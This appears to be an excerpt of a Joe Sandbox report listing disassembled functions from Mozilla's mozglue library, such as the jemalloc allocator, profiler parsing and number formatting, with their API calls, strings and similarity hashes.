Instruction Fuzzy Hash: 83923C71A083418FD724CF18D49079BB7E1BFC9348F18891DE99A9B751DB30E989CB92

Function 6CA02E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CA02ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA02EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6CA02F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA03214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA03242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA036BF

Strings

set , xrefs: 6CA036EC
get , xrefs: 6CA03205
MOZ_PROFILER_SYMBOLICATE, xrefs: 6CA0378D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: a2615a264576535268fde7a03842178f8f37f6b6159a076b910abf09f29cbc08
Instruction ID: f4c97e5c38e995fd5ab7d2d4daf382b7cff3ec020b0772a7fc3e430c7510f380
Opcode Fuzzy Hash: a2615a264576535268fde7a03842178f8f37f6b6159a076b910abf09f29cbc08
Instruction Fuzzy Hash: 9C327D706093818FD324CF24D490A9FBBE2AFC9358F58891DE5D987751DB31E88ACB52

Function 6C9F7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

schema, xrefs: 6C9F81E3, 6C9F8311
data, xrefs: 6C9F8280, 6C9F83E1
name, xrefs: 6C9F7ECF, 6C9F8335
(pre-xul), xrefs: 6C9F7E88

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 39a1ed6859097ede83a8a33bf3c8580023af4075cd9f1b80cec4d7c4f59af366
Instruction ID: 8ba140954840e9fb40d1d312b1864f56e5ddc366562663f59341cdd8691c3dfb
Opcode Fuzzy Hash: 39a1ed6859097ede83a8a33bf3c8580023af4075cd9f1b80cec4d7c4f59af366
Instruction Fuzzy Hash: 28E17EB1B043508BC710CF68885066BFBE9BFA5314F148A2DE899E7790DB74DD498B92

Function 6C9DD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD4F2
LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD50B

Part of subcall function 6C9BCFE0: EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9BCFF6
Part of subcall function 6C9BCFE0: LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9BD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD52E
EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9DD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DD6A6
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9DD712
LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C9DD82C
<jemalloc>, xrefs: 6C9DD827

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: dd15f404ab8de171373b237b4379e6d6f80f184c2b1ed86786e66d2c60389f3a
Instruction ID: 046899b4d4557148854147cbca166b97b38e63b3515101d861da19fa3c5e8c8d
Opcode Fuzzy Hash: dd15f404ab8de171373b237b4379e6d6f80f184c2b1ed86786e66d2c60389f3a
Instruction Fuzzy Hash: 8F91C372A04B018FD718CF28C4A472AB7E5EB99714F16C92EE59AD7B80D730E845CF91

Function 6C9D5E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
memset.VCRUNTIME140(6CA17765,000000E5,A3C09015), ref: 6C9D61F0
VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C9D7652

Strings

MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9D72F8
MOZ_CRASH(), xrefs: 6C9D7BA4
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9D730D
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9D7BCD, 6C9D7C1F, 6C9D7C34, 6C9D80FD
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9D72E3

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 2613674957-1127040744
Opcode ID: d1f997c76515656aa92c3971342f8f02906cfbb4b214d12995ae86e3903aa061
Instruction ID: bc8a6237d97af90ccfc30c42272024b91ce07752a135ce3d7c6061f805813f45
Opcode Fuzzy Hash: d1f997c76515656aa92c3971342f8f02906cfbb4b214d12995ae86e3903aa061
Instruction Fuzzy Hash: E7336D71605B018FD308CF28C590615FBE6BF85328F2AC6ADE9699F7A9D731E841CB41

Function 6C9B3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C9B350E
__Init_thread_footer.LIBCMT ref: 6C9B3522
__aulldiv.LIBCMT ref: 6C9B3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9B3592

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C9B3508
kernel32.dll, xrefs: 6C9B34EA

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 6a70a03ea179501ab45b60dee5b8e947a0c8a92d490b3a0ac797e5acb4d1e427
Instruction ID: e1c38faf581e4e1a815d7fa0d006a1f6ba9e1f2439ba5d4702c6de8a17b09a1c
Opcode Fuzzy Hash: 6a70a03ea179501ab45b60dee5b8e947a0c8a92d490b3a0ac797e5acb4d1e427
Instruction Fuzzy Hash: 0D31A171B00346ABDF18DBB9DD68AAA77B9FB55304F108119E509E3690DB70D906CB60

Function 6CA04820 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 744COMMON

Download Yara Rule

Strings

schema, xrefs: 6CA048C1
expected a ProfilerOverheadDuration entry after ProfilerOverheadTime, xrefs: 6CA04CAF
expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3, xrefs: 6CA04DB8, 6CA04DD8
data, xrefs: 6CA049B4
ProfileBuffer parse error: %s, xrefs: 6CA04DD9
-%llu, xrefs: 6CA04825
expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration, xrefs: 6CA04D0A
expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2, xrefs: 6CA04D65

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free
String ID: -%llu$ProfileBuffer parse error: %s$data$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3$schema
API String ID: 1294909896-3225433307
Opcode ID: c583586b56e220491d79c11c04b2c6a9aeda12020b92d699968ff9e189f16ced
Instruction ID: 50436eab7f90055529343576ad67af2338d0d9b6696ee43dc7ca6bb6ed91d900
Opcode Fuzzy Hash: c583586b56e220491d79c11c04b2c6a9aeda12020b92d699968ff9e189f16ced
Instruction Fuzzy Hash: 5672E971A18B858BD321CF38C4513ABF7E5AFDA384F148B1DE4896B611EB70A4C5DB42

Function 6CA14EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6CA14EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA14F2E
moz_xmalloc.MOZGLUE ref: 6CA14F52
memset.VCRUNTIME140(00000000,00000000), ref: 6CA14F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA152B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA152E6
Sleep.KERNEL32(00000010), ref: 6CA15481
free.MOZGLUE(?), ref: 6CA15498

Strings

(, xrefs: 6CA15250

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 2323bbe17e0e9a21894aa0bc9e14a68e51a9d9856e85546728d2d521b40931cd
Instruction ID: 20944bc26409179fb03b61fc4b33036b69193b1ba918a6067d101961bf706238
Opcode Fuzzy Hash: 2323bbe17e0e9a21894aa0bc9e14a68e51a9d9856e85546728d2d521b40931cd
Instruction Fuzzy Hash: CCF1C271A18B018FC716CF39C86062BB7B5AFD6284F05872EF84AA7651DB31D446CB81

Function 6C9C7810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E744), ref: 6C9C7885
LeaveCriticalSection.KERNEL32(6CA3E744), ref: 6C9C78A5
EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9C78AD
LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9C78CD
EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9C78D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9C78E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C9C795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C9C79BB
LeaveCriticalSection.KERNEL32(?), ref: 6C9C7BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9C7C82
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9C7CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C9C7DAF

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: e643f7db314dd2c595c26645cff264166977727456de04188dd64686d58932d9
Instruction ID: 2118ca8d420bcf0c41a5761ea0af93f2014a48d4926370f3d54c545d98015fd7
Opcode Fuzzy Hash: e643f7db314dd2c595c26645cff264166977727456de04188dd64686d58932d9
Instruction Fuzzy Hash: 30028F31A4121A8FDB54CF19C984799B7B5FF88318F2982AAD80DA7741D730EE91CF81

Function 6CA15FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6CA16009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CA16024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C9BEE51,?), ref: 6CA16046
OutputDebugStringA.KERNEL32(?,6C9BEE51,?), ref: 6CA16061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA16069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA16073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA16082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CA3148E), ref: 6CA16091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C9BEE51,00000000,?), ref: 6CA160BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA160C4

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: 19b84bc8164adb06510ae2921ef9042bfc5345667e80dc864e6e7e1759bc18a8
Instruction ID: 92cf21e619d1799f6b27819805d1b5580d4f01e636ec1495357675739a26ccc4
Opcode Fuzzy Hash: 19b84bc8164adb06510ae2921ef9042bfc5345667e80dc864e6e7e1759bc18a8
Instruction Fuzzy Hash: D021B1B1A003199FDB205F28DC09AAA7BB9FF45218F04C568E81ED7640DB34E959CFD1

Function 6CA17030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6CA17046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6CA17060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA1707E

Part of subcall function 6C9C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9C81DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA17096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA1709C
LocalFree.KERNEL32(?), ref: 6CA170AA

Strings

### ERROR: %s: %s, xrefs: 6CA17087
(null), xrefs: 6CA1706A, 6CA17083

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 3c2eafce323b39229874bf8a61e430173946646d19ff137077a814815e7b2351
Instruction ID: 573ab15ba42bb15abb04788a9484eced8f80428a4e69f3c98d9f8497f8cbec37
Opcode Fuzzy Hash: 3c2eafce323b39229874bf8a61e430173946646d19ff137077a814815e7b2351
Instruction Fuzzy Hash: 46012DB1B00309AFDB149B68EC1ADAF7BBDEF49214F010135FA0DE3241D631A9048BA1

Function 6C9D9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C9D9EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C9D9F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9D9F34
LeaveCriticalSection.KERNEL32(?), ref: 6C9DA823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DA83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9DA849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9DA8B1, 6C9DA8D4, 6C9DA8EF

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: 060255725f0ed9d8b9c362e90240df41eed3320d527f725feea9a487c8aa48fa
Instruction ID: 44beb404245ccb1212e4080a7df921c75a48c0685ca3fb1fcba3fc873394f8e6
Opcode Fuzzy Hash: 060255725f0ed9d8b9c362e90240df41eed3320d527f725feea9a487c8aa48fa
Instruction Fuzzy Hash: 86728F72A15B118FD304CF28C540215FBE5BF85328F2AC7ADE869AB791DB35E851CB81

Function 6CA02C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CA02C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CA02C61

Part of subcall function 6C9B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9B4E5A
Part of subcall function 6C9B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C9B4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA02C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA02E2D

Part of subcall function 6C9C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9C81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6CA02E3B
(root), xrefs: 6CA0354F
expected a Time entry, xrefs: 6CA02E36

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: a6838177ce2c419ad1956519d190dceae4092dde2ae331d3e9a73ad79ef25e3c
Instruction ID: b8523f87424393c87a25cbe9952d757e2682e073bb638ba911a856f0d5f8b1ec
Opcode Fuzzy Hash: a6838177ce2c419ad1956519d190dceae4092dde2ae331d3e9a73ad79ef25e3c
Instruction Fuzzy Hash: ED91DF707087418FC724CF28D49469FB7E1AF8939CF148A2DE99A87791DB30D989CB52

Function 6C9DC0E0 Relevance: 11.2, APIs: 4, Strings: 2, Instructions: 728COMMON

Download Yara Rule

Strings

0123456789abcdef, xrefs: 6C9DC317
MOZ_CRASH(), xrefs: 6C9DD4BB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID: 0123456789abcdef$MOZ_CRASH()
API String ID: 0-3968268099
Opcode ID: 40907f7a0bc24e3d9cfafccfbac5372de737edf2a752a3f3ccc77ec82fcc0890
Instruction ID: e07a776c6cc1f773f198264f0bd6afade6982df1b5a97e650f61a9b2462f4f7b
Opcode Fuzzy Hash: 40907f7a0bc24e3d9cfafccfbac5372de737edf2a752a3f3ccc77ec82fcc0890
Instruction Fuzzy Hash: 8352F431608B418FD724CF18C46076AB7E6FB86318F15C91DE9DAA7B81C735E846CB92

Function 6CA19E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6CA19F3D
__aulldiv.LIBCMT ref: 6CA19F77
__aullrem.LIBCMT ref: 6CA19F8C
__aulldiv.LIBCMT ref: 6CA1A023

Strings

-Infinity, xrefs: 6CA19E60, 6CA19E7B
NaN, xrefs: 6CA19EAB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

